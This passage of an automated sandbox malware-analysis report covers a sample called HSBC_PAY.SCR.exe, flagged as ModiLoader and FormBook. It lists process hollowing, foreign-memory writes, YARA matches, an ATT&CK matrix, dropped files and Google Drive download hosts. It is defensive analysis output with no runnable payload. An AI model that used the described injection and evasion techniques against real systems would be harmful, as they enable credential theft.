                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290743D4 mov eax, dword ptr fs:[00000030h]3_2_290743D4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290743D4 mov eax, dword ptr fs:[00000030h]3_2_290743D4
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E3DB mov eax, dword ptr fs:[00000030h]3_2_2907E3DB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E3DB mov eax, dword ptr fs:[00000030h]3_2_2907E3DB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E3DB mov ecx, dword ptr fs:[00000030h]3_2_2907E3DB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2907E3DB mov eax, dword ptr fs:[00000030h]3_2_2907E3DB
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290063FF mov eax, dword ptr fs:[00000030h]3_2_290063FF
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE3F0 mov eax, dword ptr fs:[00000030h]3_2_28FEE3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE3F0 mov eax, dword ptr fs:[00000030h]3_2_28FEE3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FEE3F0 mov eax, dword ptr fs:[00000030h]3_2_28FEE3F0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FE03E9 mov eax, dword ptr fs:[00000030h]3_2_28FE03E9
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]3_2_28FD83C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]3_2_28FD83C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]3_2_28FD83C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FD83C0 mov eax, dword ptr fs:[00000030h]3_2_28FD83C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]3_2_28FDA3C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]3_2_28FDA3C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]3_2_28FDA3C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]3_2_28FDA3C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]3_2_28FDA3C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FDA3C0 mov eax, dword ptr fs:[00000030h]3_2_28FDA3C0
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29058243 mov eax, dword ptr fs:[00000030h]3_2_29058243
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_29058243 mov ecx, dword ptr fs:[00000030h]3_2_29058243
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_290A625D mov eax, dword ptr fs:[00000030h]3_2_290A625D
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908A250 mov eax, dword ptr fs:[00000030h]3_2_2908A250
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_2908A250 mov eax, dword ptr fs:[00000030h]3_2_2908A250
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8397 mov eax, dword ptr fs:[00000030h]3_2_28FC8397
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8397 mov eax, dword ptr fs:[00000030h]3_2_28FC8397
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FC8397 mov eax, dword ptr fs:[00000030h]3_2_28FC8397
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF438F mov eax, dword ptr fs:[00000030h]3_2_28FF438F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FF438F mov eax, dword ptr fs:[00000030h]3_2_28FF438F
                      Source: C:\Users\Public\Libraries\uzonfntK.pifCode function: 3_2_28FCE388 mov eax, dword ptr fs:[00000030h]3_2_28FCE388

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeMemory allocated: C:\Users\Public\Libraries\uzonfntK.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFMemory allocated: C:\Users\Public\Libraries\uzonfntK.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFMemory allocated: C:\Users\Public\Libraries\uzonfntK.pif base: 400000 protect: page execute and read and writeJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Source: C:\Users\Public\Libraries\uzonfntK.pifSection loaded: NULL target: C:\Users\Public\Libraries\Ktnfnozu.PIF protection: execute and read and writeJump to behavior
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeSection unmapped: C:\Users\Public\Libraries\uzonfntK.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection unmapped: C:\Users\Public\Libraries\uzonfntK.pif base address: 400000Jump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFSection unmapped: C:\Users\Public\Libraries\uzonfntK.pif base address: 400000Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeMemory written: C:\Users\Public\Libraries\uzonfntK.pif base: 364008Jump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFMemory written: C:\Users\Public\Libraries\uzonfntK.pif base: 3B1008Jump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFMemory written: C:\Users\Public\Libraries\uzonfntK.pif base: 378008Jump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pifJump to behavior
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFProcess created: C:\Users\Public\Libraries\uzonfntK.pif C:\Users\Public\Libraries\uzonfntK.pifJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02A85A78
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: GetLocaleInfoA,0_2_02A8A790
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: GetLocaleInfoA,0_2_02A8A744
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02A85B84
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_02995A78
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: GetLocaleInfoA,5_2_0299A790
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,5_2_02995B83
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8918C GetLocalTime,0_2_02A8918C
                      Source: C:\Users\user\Desktop\HSBC_PAY.SCR.exeCode function: 0_2_02A8B70C GetVersionExA,0_2_02A8B70C
                      Source: C:\Users\Public\Libraries\Ktnfnozu.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.uzonfntK.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.uzonfntK.pif.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.2140430291.00000000292F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2255713355.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2214229432.000000001E430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2280734227.0000000028280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2197880197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2097027277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts                      		1
                      Native API                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		11
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Shared Modules                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Access Token Manipulation                      		1
                      Valid Accounts                      		LSASS Memory221
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt1
                      DLL Side-Loading                      		411
                      Process Injection                      		1
                      Access Token Manipulation                      		Security Account Manager2
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Registry Run Keys / Startup Folder                      		2
                      Virtualization/Sandbox Evasion                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput Capture113
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading                      		411
                      Process Injection                      		LSA Secrets1
                      System Network Connections Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Deobfuscate/Decode Files or Information                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                      Obfuscated Files or Information                      		DCSync35
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583879 Sample: HSBC_PAY.SCR.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 100 44 drive.usercontent.google.com 2->44 46 drive.google.com 2->46 56 Found malware configuration 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 10 other signatures 2->62 8 HSBC_PAY.SCR.exe 1 10 2->8         started        13 Ktnfnozu.PIF 6 2->13         started        15 Ktnfnozu.PIF 6 2->15         started        signatures3 process4 dnsIp5 48 drive.google.com 142.250.184.238, 443, 49730, 49731 GOOGLEUS United States 8->48 50 drive.usercontent.google.com 142.250.185.129, 443, 49732 GOOGLEUS United States 8->50 36 C:\Users\Public\Libraries\uzonfntK.pif, PE32 8->36 dropped 38 C:\Users\Public\Libraries\Ktnfnozu.PIF, PE32 8->38 dropped 40 C:\Users\Public\Libraries\Ktnfnozu, data 8->40 dropped 42 2 other malicious files 8->42 dropped 64 Drops PE files with a suspicious file extension 8->64 66 Writes to foreign memory regions 8->66 68 Allocates memory in foreign processes 8->68 70 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->70 17 uzonfntK.pif 8->17         started        20 cmd.exe 1 8->20         started        72 Antivirus detection for dropped file 13->72 74 Multi AV Scanner detection for dropped file 13->74 76 Machine Learning detection for dropped file 13->76 22 uzonfntK.pif 13->22         started        24 cmd.exe 13->24         started        78 Sample uses process hollowing technique 15->78 80 Sample is not signed and drops a device driver 15->80 26 uzonfntK.pif 15->26         started        28 cmd.exe 1 15->28         started        file6 signatures7 process8 signatures9 52 Detected unpacking (changes PE section rights) 17->52 54 Maps a DLL or memory area into another process 17->54 30 conhost.exe 20->30         started        32 conhost.exe 24->32         started        34 conhost.exe 28->34         started        process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      HSBC_PAY.SCR.exe50%ReversingLabsWin32.Trojan.ModiLoader
                      HSBC_PAY.SCR.exe100%AviraHEUR/AGEN.1325882
                      HSBC_PAY.SCR.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Libraries\Ktnfnozu.PIF100%AviraHEUR/AGEN.1325882
                      C:\Users\Public\Libraries\Ktnfnozu.PIF100%Joe Sandbox ML
                      C:\Users\Public\Libraries\Ktnfnozu.PIF50%ReversingLabsWin32.Trojan.ModiLoader
                      C:\Users\Public\Libraries\uzonfntK.pif3%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      drive.google.com
                      		142.250.184.238
                      		truefalse
                        		high
                        drive.usercontent.google.com
                        		142.250.185.129
                        		truefalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            https://drive.usercontent.google.com/HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://sectigo.com/CPS0HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.sectigo.com0HSBC_PAY.SCR.exe, 00000000.00000002.1719635955.0000000021816000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698454245.000000007F0A0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1723167222.000000007F5E0000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1717955033.00000000207A4000.00000004.00001000.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000002.1719371809.00000000216DE000.00000004.00000020.00020000.00000000.sdmp, HSBC_PAY.SCR.exe, 00000000.00000003.1698278721.000000007F103000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1906626349.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000002.1960770240.0000000021090000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 00000005.00000003.1845495166.0000000000742000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 00000008.00000001.1848189708.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, Ktnfnozu.PIF, 0000000B.00000003.1935639045.0000000000804000.00000004.00000020.00020000.00000000.sdmp, uzonfntK.pif, 0000000E.00000002.2255713355.00000000007F0000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://drive.google.com/HSBC_PAY.SCR.exe, 00000000.00000002.1704021459.000000000059E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
